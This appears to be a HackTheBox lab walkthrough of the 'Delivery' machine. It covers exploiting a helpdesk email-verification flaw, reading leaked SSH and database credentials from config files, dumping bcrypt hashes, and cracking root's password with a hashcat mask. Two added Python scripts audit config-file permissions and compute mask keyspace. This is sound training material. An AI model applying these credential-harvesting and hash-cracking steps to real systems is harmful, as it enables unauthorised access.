Delivery
An easy Linux box from HackTheBox. A neat helpdesk-ticket trick yields an email address on the box's own domain, which is enough to register on the messaging service and read messages from root that contain plaintext SSH creds. From there, dump the password hashes from the database and crack them for root.
Recon
Running the usual nmap
georgy@pop-os:~/Documents/htb/delivery$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.222
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c40fa859b01acac0ebc0c19518aee27 (RSA)
| 256 5a0cc03b9b76552e6ec4f4b95d761709 (ECDSA)
|_ 256 b79df7489da2f27630fd42d3353a808c (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Pretty much just a web server; browsing to it shows a home page with not much on it.
Snooping around for links, the “HelpDesk” link on the homepage goes to “helpdesk.delivery.htb” and the “Contact Us” page has a link to “delivery.htb:8065”
Add delivery.htb and helpdesk.delivery.htb to /etc/hosts
On the helpdesk side, searchsploit turns up an SSRF in ticket submission, but it proved to be a rabbit hole
On port 8065 there is a Mattermost instance where we can create an account, but we get blocked because the email address has to be verified by clicking a link that is sent to it, and obviously domains like @gmail.com don't work
Also should note that the “Contact Us” page specifies
Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.
So we need a delivery.htb address
Let's submit a ticket with random info just to try it, and see that on submission we get an email address containing the ticket number
In my case my email is 6227474@delivery.htb
Now maybe we can use this email to sign up, and see the verification link in the ticket details?
Exploitation
Sign up with 6227474@delivery.htb, with a password of Password1! - and go back to view our ticket
And see the verification link!
Using that, get access to the Mattermost instance, and immediately see creds for the mail user
maildeliverer:Youve_G0t_Mail!
As well as a hint for privesc: cracking hashes with variations of PleaseSubscribe!
Can now get a shell using ssh
georgy@pop-os:~/Documents/htb/delivery$ ssh maildeliverer@delivery.htb
maildeliverer@delivery.htb's password:
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 7 19:08:25 2022 from 10.10.14.13
maildeliverer@Delivery:~$ whoami
maildeliverer
Doing the usual enumeration, find an SQL server listening on localhost
maildeliverer@Delivery:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
...
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
...
There should be creds inside a config file for either the osTicket or the Mattermost instance; googling shows that osTicket uses a MariaDB backend, and so does Mattermost
Googling for where osTicket keeps its SQL creds shows they live in a file called “ost-config.php”, so search for it
maildeliverer@Delivery:/var$ find ./ -name *conf*.php 2>/dev/null
./www/osticket/upload/include/ost-sampleconfig.php
./www/osticket/upload/include/client/register.confirm.inc.php
./www/osticket/upload/include/client/register.confirmed.inc.php
./www/osticket/upload/include/class.config.php
./www/osticket/upload/include/staff/templates/confirm.tmpl.php
./www/osticket/upload/include/staff/templates/dynamic-field-config.tmpl.php
./www/osticket/upload/include/ost-config.php
./www/osticket/upload/include/ajax.config.php
Catting it out, find the creds in plaintext
# Mysql Login info
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');
Connecting and looking at the staff users, see that there is only maildeliverer
maildeliverer@Delivery:/opt$ mysql -h 127.0.0.1 -P 8888 -u ost_user --database=osticket --password=\!H3lpD3sk123!
mysql> select * from ost_staff;
...
| 1 | 1 | 1 | maildeliverer | Delivery | Person | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy | NULL | maildeliverer@delivery.htb | | NULL | | | NULL | NULL
...
So move on to mattermost, find it in /opt/, and search it for config files
maildeliverer@Delivery:/opt$ find ./ -name *conf* 2>/dev/null
./mattermost/config
./mattermost/config/config.json
Cat out the json file and find the sql login creds
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
}
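Both files above (osTicket's ost-config.php define() lines and Mattermost's config.json DSN) were readable from an unprivileged shell, which is what hands over the database. As an added example, not code from the writeup or from either project, here is a small audit that parses both formats and flags a file whose plaintext DB password is readable by users other than its owner; the sample file bodies, passwords and file modes are constructed for the demo.

```python
import json
import os
import re
import tempfile

# Constructed samples shaped like the two config files found on the box.
# The passwords are placeholders, not the real values from the box.
OST_CONFIG_PHP = """<?php
define('DBHOST','localhost');
define('DBUSER','ost_user');
define('DBPASS','placeholder-ost-pass');
"""
MM_CONFIG_JSON = json.dumps({"SqlSettings": {"DriverName": "mysql", "DataSource":
    "mmuser:placeholder-mm-pass@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4"}})

DEFINE_RE = re.compile(r"define\(\s*'(DB\w+)'\s*,\s*'([^']*)'\s*\)")
# Go MySQL DSN layout used by Mattermost: user:password@protocol(address)/dbname?params
DSN_RE = re.compile(r"^(?P<user>[^:@]+):(?P<pw>[^@]*)@\w+\((?P<addr>[^)]*)\)/(?P<db>[^?]*)")

def osticket_db_creds(text):
    """(user, password, host) from the define() lines of an ost-config.php body."""
    d = dict(DEFINE_RE.findall(text))
    return d.get("DBUSER"), d.get("DBPASS"), d.get("DBHOST")

def mattermost_db_creds(text):
    """(user, password, address) from Mattermost's SqlSettings.DataSource DSN."""
    m = DSN_RE.match(json.loads(text)["SqlSettings"]["DataSource"])
    if not m:
        raise ValueError("unrecognised DSN")
    return m["user"], m["pw"], m["addr"]

def audit(path, parser):
    """Report whether a config file holds a plaintext DB password and whether
    users other than its owner can read it (group or world read bit set)."""
    with open(path) as f:
        user, pw, host = parser(f.read())
    others_can_read = bool(os.stat(path).st_mode & 0o044)
    return {"file": os.path.basename(path), "db_user": user, "host": host,
            "has_plaintext_password": bool(pw), "readable_by_others": others_can_read}

def demo():
    """Write the samples to a temp dir, one world-readable (0644) and one
    owner-only (0600), and audit both. The modes are constructed for the demo."""
    d = tempfile.mkdtemp()
    ost, mm = os.path.join(d, "ost-config.php"), os.path.join(d, "config.json")
    for path, body, mode in ((ost, OST_CONFIG_PHP, 0o644), (mm, MM_CONFIG_JSON, 0o600)):
        with open(path, "w") as f:
            f.write(body)
        os.chmod(path, mode)
    return [audit(ost, osticket_db_creds), audit(mm, mattermost_db_creds)]
```

Run `demo()` to see the two findings; the first file is the one an unprivileged user could read, as on the box.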
So dump the Users table inside the mattermost database
maildeliverer@Delivery:/opt$ mysql -h 127.0.0.1 -u mmuser --password=Crack_The_MM_Admin_PW
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 125
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mattermost]> select * from Users;
...dumped...
And see the root user, and their hash
| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL | | root@delivery.htb | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 0 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
root : $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
Now, as the message hinted, use hashcat with “PleaseSubscribe!” as a fixed prefix in the mask and brute-force only the tail of the password
georgy@pop-os:~/Documents/htb/delivery$ hashcat -m 3200 hash.txt -a 3 -1?l?u?d PleaseSubscribe\!?1?1?1?1 --increment --increment-min 17
...
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
Cracked to be root:PleaseSubscribe!21
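To see why the hint makes this crack cheap even though the hash is bcrypt at cost 10, here is an added example (not from the writeup or from hashcat) that computes the keyspace of a hashcat mask, including custom charsets and --increment, and the worst-case time at a given hash rate; it is written generally, so it works for any mask, not just the one above. The hash rate is whatever the reader measures for their own hardware, and the names below are my own.

```python
import math

# Sizes of hashcat's built-in charsets; only the sizes matter for counting.
BUILTIN = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "h": 16, "H": 16}

def parse_mask(mask, custom=None):
    """Per-position charset sizes of a hashcat mask. Literals count as 1,
    '??' is a literal '?', and ?1..?4 are looked up in `custom`
    (e.g. {"1": "?l?u?d"}), assuming the pieces of a custom set don't overlap."""
    custom = custom or {}
    sizes, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            tok = mask[i + 1]
            if tok == "?":
                sizes.append(1)
            elif tok in BUILTIN:
                sizes.append(BUILTIN[tok])
            elif tok in custom:
                sizes.append(sum(parse_mask(custom[tok])))
            else:
                raise ValueError(f"unknown mask token ?{tok}")
            i += 2
        else:
            sizes.append(1)
            i += 1
    return sizes

def keyspace(mask, custom=None, inc_min=None, inc_max=None):
    """Number of candidates. With --increment (inc_min set), sum over mask
    lengths inc_min..inc_max, where a length counts positions, literals included."""
    sizes = parse_mask(mask, custom)
    if inc_min is None:
        return math.prod(sizes)
    inc_max = inc_max if inc_max is not None else len(sizes)
    return sum(math.prod(sizes[:n]) for n in range(inc_min, inc_max + 1))

def crack_time_seconds(mask, custom, inc_min, hashes_per_sec):
    """Worst-case time to exhaust the mask at a measured bcrypt speed."""
    return keyspace(mask, custom, inc_min) / hashes_per_sec

# The writeup's run: 16 literal prefix characters, four ?1 positions and
# --increment-min 17, i.e. suffix lengths 1..4 over a 62-character set.
PAGE_MASK, PAGE_CUSTOM, PAGE_INC_MIN = "PleaseSubscribe!?1?1?1?1", {"1": "?l?u?d"}, 17
```

The page's mask is only about 15 million candidates; raising the bcrypt cost scales that time linearly, while the leaked prefix and short suffix are what make the keyspace tiny in the first place.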
Now can su to root
maildeliverer@Delivery:/opt$ su root
Password:
root@Delivery:/opt# whoami
root
root@Delivery:/opt#